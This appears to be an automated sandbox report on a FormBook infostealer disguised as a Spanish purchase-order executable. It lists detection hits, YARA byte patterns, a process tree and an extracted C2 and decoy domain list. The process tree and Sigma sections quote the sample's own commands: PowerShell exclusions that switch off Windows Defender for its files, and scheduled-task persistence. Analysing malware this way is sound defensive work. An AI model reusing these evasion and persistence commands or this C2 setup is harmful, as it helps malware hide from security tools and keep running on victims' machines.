Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Orden de compra 0307AR24.exe

Overview

General Information

Sample name:Orden de compra 0307AR24.exe
Analysis ID:1467133
MD5:7bb0f568ce14d2350c704aea2c4bc9de
SHA1:3c6cc8de9a66613ce41f37cf1fd22990e80ce725
SHA256:eaffc7cc6da06f5894642bb88fff4a0186cf61100558af3cb552145f86d8e041
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Orden de compra 0307AR24.exe (PID: 2572 cmdline: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe" MD5: 7BB0F568CE14D2350C704AEA2C4BC9DE)
    • powershell.exe (PID: 4416 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7380 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 760 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 7500 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • systray.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • cmd.exe (PID: 7640 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rundll32.exe (PID: 7796 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
  • RggSaCWUvAyNK.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe MD5: 7BB0F568CE14D2350C704AEA2C4BC9DE)
    • schtasks.exe (PID: 7540 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 39 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          9.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          9.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          9.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ProcessId: 4416, ProcessName: powershell.exe
          Sigma detected: Rundll32 Execution Without CommandLine Parameters
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 7796, ProcessName: rundll32.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ProcessId: 4416, ProcessName: powershell.exe
          Sigma detected: Suspicious Add Scheduled Task Parent
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, ParentImage: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe, ParentProcessId: 7360, ParentProcessName: RggSaCWUvAyNK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp", ProcessId: 7540, ProcessName: schtasks.exe
          Sigma detected: Suspicious Schtasks From Env Var Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", ProcessId: 760, ProcessName: schtasks.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ProcessId: 4416, ProcessName: powershell.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Scheduled temp file as task from temp location
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden de compra 0307AR24.exe", ParentImage: C:\Users\user\Desktop\Orden de compra 0307AR24.exe, ParentProcessId: 2572, ParentProcessName: Orden de compra 0307AR24.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp", ProcessId: 760, ProcessName: schtasks.exe

          Snort Signatures

          Timestamp:07/03/24-18:33:16.719137
          SID:2031412
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:32:36.955975
          SID:2031412
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:35:19.798968
          SID:2031412
          Source Port:49737
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:36:23.287483
          SID:2031412
          Source Port:49741
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:36:00.832032
          SID:2031412
          Source Port:49740
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:33:37.796874
          SID:2031412
          Source Port:49732
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:34:18.302843
          SID:2031412
          Source Port:49734
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:35:40.453540
          SID:2031412
          Source Port:49739
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-18:34:59.312116
          SID:2031412
          Source Port:49736
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.upcyclecharms.com/md02/"], "decoy": ["onsen1508.com", "partymaxclubmen36.click", "texasshelvingwarehouse.com", "tiantiying.com", "taxcredits-pr.com", "33mgbet.com", "equipoleiremnacional.com", "andrewghita.com", "zbbnp.xyz", "englandbreaking.com", "a1b5v.xyz", "vizamag.com", "h0lg3.rest", "ux-design-courses-17184.bond", "of84.top", "qqkartel88v1.com", "avalynkate.com", "cpuk-finance.com", "yeslabs.xyz", "webuyandsellpa.com", "barnesassetrecovery.store", "hecxion.xyz", "theopencomputeproject.net", "breezyvw.christmas", "mumazyl.com", "woby.xyz", "jalaios10.vip", "lynxpire.com", "sparkbpo.com", "333689z.com", "rslotrank.win", "adscendmfmarketing.com", "detroitreels.com", "xojiliv1.com", "mzhhxxff.xyz", "hitcomply.com", "piedge-taiko.net", "chiri.lat", "bookmygaddi.com", "hjemfinesse.shop", "zruypj169g.top", "solarfundis.com", "pittsparking.com", "teplo-invest.com", "j3k7n.xyz", "coloradoskinwellness.com", "z8ggd.com", "coinbureau.xyz", "mamasprinkleofjoy.com", "xotj7a.xyz", "nijssenadventures.com", "ysa-cn.com", "tigajco69.fun", "localhomeservicesadvisor.com", "attorney-services-8344642.zone", "rnwaifu.xyz", "nyverian.com", "family-lawyers-7009103.world", "117myw.com", "kingdom66.lat", "tdshomesolution.com", "momof2filiricans.com", "saeutah.com", "rakring.com"]}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeReversingLabs: Detection: 26%
          Multi AV Scanner detection for submitted file
          Source: Orden de compra 0307AR24.exeReversingLabs: Detection: 26%
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Orden de compra 0307AR24.exeJoe Sandbox ML: detected
          Source: Orden de compra 0307AR24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Orden de compra 0307AR24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
